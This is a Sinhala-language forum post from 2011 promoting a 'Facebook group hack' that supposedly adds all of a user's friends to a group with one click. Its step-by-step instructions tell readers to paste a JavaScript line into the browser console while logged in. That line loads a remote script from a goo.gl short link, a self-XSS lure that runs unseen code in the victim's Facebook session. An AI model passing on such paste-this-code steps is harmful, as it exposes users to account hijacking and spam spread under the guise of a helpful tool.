FB ගෲප් හැක් සිස්ටම් (add all friends)

kape

Member
Jul 17, 2011
634
427
0
සිංහරාජය
FB ගෲප් හැක් සිස්ටම් (add all friends)

අලෝස් කස්ටිය.මම මාස 4කට විතර පස්සේ එලකිරියට ආවේ :( :no:


ඒ විතරක් නෙමෙයි බුකිය පැත්තේ ගියෙත් එච්චර විතර කාලෙකට පස්සෙ තමයි :shocked:
අද ගෲප් එකක මරු අයිටම් එකක් තිබ්බ.මට අලුත් උනාට මේක දන්න අය සමහර විට ඇති.රීපෝස්ට්නම් සොරි වෙන්න ඕනේ හොදේ.දැක්ක සැනින් ඔන්න දැම්ම.:)



ඉස්සරනම් ගෲප් එකකට කට්ටිය ඇඩ් කරන්න හෙන කට්ටක් කෑවනේ :) :angry:

දැන් වැඩේ සිම්පල් :) ඔක්කොම ටික එක ක්ලික් එකෙන් ඇඩ් වෙනව.මම ගෲප් 4කට විතර මගේ යාලුවො ඇඩ් කරා.පට්ට සිස්ටම් එක.මේක 100% වැඩ :)

ඔබේ මිතුරු කැල මේ ගෲපය හා සම්බන්ද කිරීමට කැමතිනම් ඔබට දැන් කලින්ට වඩා බෙහෙවින් පහසු ක්‍රමවේදයක් තිබේ :)

1. පහත ඉරි අතර ඇති සම්පුර්ණ code එකම copy කරගන්න.
_____________________________

document.body.appendChild(document.createElement('script')).src='http://goo.gl/HifmH';
_____________________________


2.http://www.facebook.com/groups/Technicalsup/ link එකෙන් ගෘප් එකට එන්න. https නම් මෙය සිදුකල නොහැකියි.(උබලට ඕනේ ගෲප් එකේ ලින්ක් එකෙන් යන්න.ලින්ක් එක මේ වගේ තියෙන්න ඕනේ)

3. Firefox නම් Ctrl + Shift + K එකවර ඇතුලත් කර
Chrome නම් F12 ඇතුලත් කර අවසානයට ඇති "Console" තෝරන්න

4. කලින් copy කරගත් code එක එතන ඇති code ඇතුලත් කල හැකි ස්ථානයේ paste කර Enter key ඇතුලත් කරන්න.

5. ඔබගේ browser එකේ එම tab එක තුල මෙය run වීමට ඉඩ හැර වෙනත් tab එකක ඔබගේ වැඩ කරගෙන යන්න. සියලු දෙනා එකතු වී අවසන් වන තුරු එම tab එක close කරගන්න එපා.

* වැඩි සාමාජිකයන් සංඛ්‍යාවක් සිටීමෙන් ඉක්මනින් ගැටලු වලට පිළිතුරු ලැබේ.
* විසදුමක ගුණාත්මක භාවය තහවුරු කරගැනීමට උපකාරී වේ.
photo.php

ප්‍රයෝජනයක් උනිනම් සැලකුවත් කමක් නෑ..
 
Last edited:
  • Like
Reactions: MBoX